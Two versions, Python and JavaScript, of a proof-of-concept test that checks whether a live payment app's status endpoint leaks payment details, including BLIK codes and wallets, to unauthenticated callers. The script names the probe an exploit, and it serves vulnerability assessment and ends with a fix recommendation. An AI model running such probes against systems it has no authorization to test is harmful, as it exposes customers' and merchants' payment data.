File: test_authz_vuln_06.py
#!/usr/bin/env python3
"""
AUTHZ-VULN-06: Test for unauthorized access to payment status endpoint
Tests if GET /api/payments/:id/status allows unauthenticated access to payment details
"""

import requests
import json
from datetime import datetime

BASE_URL = "https://solana-blik.vercel.app"

def print_section(title):
    """Print a formatted section header"""
    print("\n" + "=" * 80)
    print(f" {title}")
    print("=" * 80)

def print_request(method, url, headers=None, body=None):
    """Print request details"""
    print(f"\n{method} {url}")
    if headers:
        print("Headers:")
        for key, value in headers.items():
            print(f"  {key}: {value}")
    if body:
        print("Body:")
        print(f"  {json.dumps(body, indent=2)}")

def print_response(response):
    """Print response details"""
    print(f"\nStatus Code: {response.status_code}")
    print(f"Headers:")
    for key, value in response.headers.items():
        print(f"  {key}: {value}")
    print(f"\nResponse Body:")
    try:
        print(json.dumps(response.json(), indent=2))
    except:
        print(response.text)

def test_authz_vuln_06():
    """
    Test AUTHZ-VULN-06: Unauthorized access to payment status

    Step 1: Create a payment as a legitimate merchant
    Step 2: Access the payment status without authentication (as attacker)
    """

    print_section("AUTHZ-VULN-06: Unauthorized Payment Status Access Test")
    print(f"Test Time: {datetime.now().isoformat()}")
    print(f"Target: {BASE_URL}")

    # Step 1: Create a payment
    print_section("STEP 1: Create Payment (Legitimate Merchant)")

    create_url = f"{BASE_URL}/api/payments/create"
    create_payload = {
        "amount": 5.0,
        "merchantWallet": "11111111111111111111111111111111"
    }

    print_request("POST", create_url, body=create_payload)

    try:
        create_response = requests.post(create_url, json=create_payload)
        print_response(create_response)

        if create_response.status_code != 200:
            print("\n[ERROR] Failed to create payment")
            return False

        payment_data = create_response.json()
        payment_id = payment_data.get('paymentId')

        if not payment_id:
            print("\n[ERROR] No paymentId in response")
            return False

        print(f"\n[SUCCESS] Payment created with ID: {payment_id}")

    except Exception as e:
        print(f"\n[ERROR] Exception during payment creation: {e}")
        return False

    # Step 2: Access payment status WITHOUT authentication (EXPLOIT)
    print_section("STEP 2: Access Payment Status WITHOUT Authentication (EXPLOIT)")
    print("Scenario: Attacker (different actor) tries to access payment details")
    print("Expected if vulnerable: 200 status with payment details exposed")

    status_url = f"{BASE_URL}/api/payments/{payment_id}/status"

    # Intentionally NO authentication headers
    print_request("GET", status_url)
    print("\nNote: NO authentication headers provided (simulating attacker)")

    try:
        status_response = requests.get(status_url)
        print_response(status_response)

        # Analyze the response
        print_section("VULNERABILITY ANALYSIS")

        if status_response.status_code == 200:
            print("\n[CRITICAL] Vulnerability CONFIRMED!")
            print("The endpoint returned 200 OK without authentication")

            try:
                status_data = status_response.json()
                print("\nSensitive Information Disclosed:")
                print("-" * 80)

                disclosed_fields = []
                if 'status' in status_data:
                    print(f"  • Payment Status: {status_data['status']}")
                    disclosed_fields.append('status')

                if 'amount' in status_data:
                    print(f"  • Payment Amount: {status_data['amount']}")
                    disclosed_fields.append('amount')

                if 'code' in status_data:
                    print(f"  • BLIK Code: {status_data['code']}")
                    disclosed_fields.append('code')

                if 'reference' in status_data:
                    print(f"  • Reference: {status_data['reference']}")
                    disclosed_fields.append('reference')

                if 'merchantWallet' in status_data:
                    print(f"  • Merchant Wallet: {status_data['merchantWallet']}")
                    disclosed_fields.append('merchantWallet')

                if 'customerWallet' in status_data:
                    print(f"  • Customer Wallet: {status_data['customerWallet']}")
                    disclosed_fields.append('customerWallet')

                if 'createdAt' in status_data:
                    print(f"  • Created At: {status_data['createdAt']}")
                    disclosed_fields.append('createdAt')

                print("\n" + "-" * 80)
                print(f"Total disclosed fields: {len(disclosed_fields)}")
                print(f"Fields: {', '.join(disclosed_fields)}")

                print("\n[IMPACT] Information Disclosure Vulnerability")
                print("• Any unauthenticated user can access payment details")
                print("• Only requires knowledge of the payment UUID")
                print("• Exposes merchant business information (amounts, status)")
                print("• Could expose BLIK codes if still active")
                print("• Violates payment confidentiality")

                return True

            except Exception as e:
                print(f"\n[ERROR] Could not parse response: {e}")
                return False

        elif status_response.status_code == 401:
            print("\n[PASS] Vulnerability NOT present")
            print("Endpoint correctly requires authentication (401 Unauthorized)")
            return False

        elif status_response.status_code == 403:
            print("\n[PASS] Vulnerability NOT present")
            print("Endpoint correctly denies access (403 Forbidden)")
            return False

        else:
            print(f"\n[INFO] Unexpected status code: {status_response.status_code}")
            return False

    except Exception as e:
        print(f"\n[ERROR] Exception during status check: {e}")
        return False

if __name__ == "__main__":
    try:
        vulnerable = test_authz_vuln_06()

        print_section("TEST SUMMARY")
        print(f"Test: AUTHZ-VULN-06")
        print(f"Vulnerability: Unauthorized Payment Status Access")
        print(f"Result: {'VULNERABLE' if vulnerable else 'NOT VULNERABLE'}")

        if vulnerable:
            print("\n[RECOMMENDATION]")
            print("Add authentication and authorization checks to /api/payments/:id/status")
            print("Verify the requester has permission to view the specific payment")

    except KeyboardInterrupt:
        print("\n\n[INFO] Test interrupted by user")
    except Exception as e:
        print(f"\n\n[ERROR] Test failed with exception: {e}")

File: test_authz_vuln_06.js
#!/usr/bin/env node
/**
 * AUTHZ-VULN-06: Test for unauthorized access to payment status endpoint
 * Tests if GET /api/payments/:id/status allows unauthenticated access to payment details
 */

const BASE_URL = "https://solana-blik.vercel.app";

function printSection(title) {
    console.log("\n" + "=".repeat(80));
    console.log(` ${title}`);
    console.log("=".repeat(80));
}

function printRequest(method, url, headers = null, body = null) {
    console.log(`\n${method} ${url}`);
    if (headers) {
        console.log("Headers:");
        for (const [key, value] of Object.entries(headers)) {
            console.log(`  ${key}: ${value}`);
        }
    }
    if (body) {
        console.log("Body:");
        console.log(JSON.stringify(body, null, 2));
    }
}

function printResponse(response, data) {
    console.log(`\nStatus Code: ${response.status}`);
    console.log("Headers:");
    for (const [key, value] of response.headers.entries()) {
        console.log(`  ${key}: ${value}`);
    }
    console.log("\nResponse Body:");
    console.log(JSON.stringify(data, null, 2));
}

async function testAuthzVuln06() {
    printSection("AUTHZ-VULN-06: Unauthorized Payment Status Access Test");
    console.log(`Test Time: ${new Date().toISOString()}`);
    console.log(`Target: ${BASE_URL}`);

    // Step 1: Create a payment
    printSection("STEP 1: Create Payment (Legitimate Merchant)");

    const createUrl = `${BASE_URL}/api/payments/create`;
    const createPayload = {
        amount: 5.0,
        merchantWallet: "11111111111111111111111111111111"
    };

    printRequest("POST", createUrl, null, createPayload);

    let paymentId;

    try {
        const createResponse = await fetch(createUrl, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify(createPayload)
        });

        const createData = await createResponse.json();
        printResponse(createResponse, createData);

        if (createResponse.status !== 200) {
            console.log("\n[ERROR] Failed to create payment");
            return false;
        }

        paymentId = createData.paymentId;

        if (!paymentId) {
            console.log("\n[ERROR] No paymentId in response");
            return false;
        }

        console.log(`\n[SUCCESS] Payment created with ID: ${paymentId}`);

    } catch (error) {
        console.log(`\n[ERROR] Exception during payment creation: ${error.message}`);
        return false;
    }

    // Step 2: Access payment status WITHOUT authentication (EXPLOIT)
    printSection("STEP 2: Access Payment Status WITHOUT Authentication (EXPLOIT)");
    console.log("Scenario: Attacker (different actor) tries to access payment details");
    console.log("Expected if vulnerable: 200 status with payment details exposed");

    const statusUrl = `${BASE_URL}/api/payments/${paymentId}/status`;

    // Intentionally NO authentication headers
    printRequest("GET", statusUrl);
    console.log("\nNote: NO authentication headers provided (simulating attacker)");

    try {
        const statusResponse = await fetch(statusUrl);
        const statusData = await statusResponse.json();
        printResponse(statusResponse, statusData);

        // Analyze the response
        printSection("VULNERABILITY ANALYSIS");

        if (statusResponse.status === 200) {
            console.log("\n[CRITICAL] Vulnerability CONFIRMED!");
            console.log("The endpoint returned 200 OK without authentication");

            console.log("\nSensitive Information Disclosed:");
            console.log("-".repeat(80));

            const disclosedFields = [];

            if (statusData.status !== undefined) {
                console.log(`  • Payment Status: ${statusData.status}`);
                disclosedFields.push('status');
            }

            if (statusData.amount !== undefined) {
                console.log(`  • Payment Amount: ${statusData.amount}`);
                disclosedFields.push('amount');
            }

            if (statusData.code !== undefined) {
                console.log(`  • BLIK Code: ${statusData.code}`);
                disclosedFields.push('code');
            }

            if (statusData.reference !== undefined) {
                console.log(`  • Reference: ${statusData.reference}`);
                disclosedFields.push('reference');
            }

            if (statusData.merchantWallet !== undefined) {
                console.log(`  • Merchant Wallet: ${statusData.merchantWallet}`);
                disclosedFields.push('merchantWallet');
            }

            if (statusData.customerWallet !== undefined) {
                console.log(`  • Customer Wallet: ${statusData.customerWallet}`);
                disclosedFields.push('customerWallet');
            }

            if (statusData.createdAt !== undefined) {
                console.log(`  • Created At: ${statusData.createdAt}`);
                disclosedFields.push('createdAt');
            }

            console.log("\n" + "-".repeat(80));
            console.log(`Total disclosed fields: ${disclosedFields.length}`);
            console.log(`Fields: ${disclosedFields.join(', ')}`);

            console.log("\n[IMPACT] Information Disclosure Vulnerability");
            console.log("• Any unauthenticated user can access payment details");
            console.log("• Only requires knowledge of the payment UUID");
            console.log("• Exposes merchant business information (amounts, status)");
            console.log("• Could expose BLIK codes if still active");
            console.log("• Violates payment confidentiality");

            return true;

        } else if (statusResponse.status === 401) {
            console.log("\n[PASS] Vulnerability NOT present");
            console.log("Endpoint correctly requires authentication (401 Unauthorized)");
            return false;

        } else if (statusResponse.status === 403) {
            console.log("\n[PASS] Vulnerability NOT present");
            console.log("Endpoint correctly denies access (403 Forbidden)");
            return false;

        } else {
            console.log(`\n[INFO] Unexpected status code: ${statusResponse.status}`);
            return false;
        }

    } catch (error) {
        console.log(`\n[ERROR] Exception during status check: ${error.message}`);
        return false;
    }
}

// Run the test
(async () => {
    try {
        const vulnerable = await testAuthzVuln06();

        printSection("TEST SUMMARY");
        console.log("Test: AUTHZ-VULN-06");
        console.log("Vulnerability: Unauthorized Payment Status Access");
        console.log(`Result: ${vulnerable ? 'VULNERABLE' : 'NOT VULNERABLE'}`);

        if (vulnerable) {
            console.log("\n[RECOMMENDATION]");
            console.log("Add authentication and authorization checks to /api/payments/:id/status");
            console.log("Verify the requester has permission to view the specific payment");
        }

        process.exit(vulnerable ? 1 : 0);

    } catch (error) {
        console.log(`\n\n[ERROR] Test failed with exception: ${error.message}`);
        console.log(error.stack);
        process.exit(2);
    }
})();
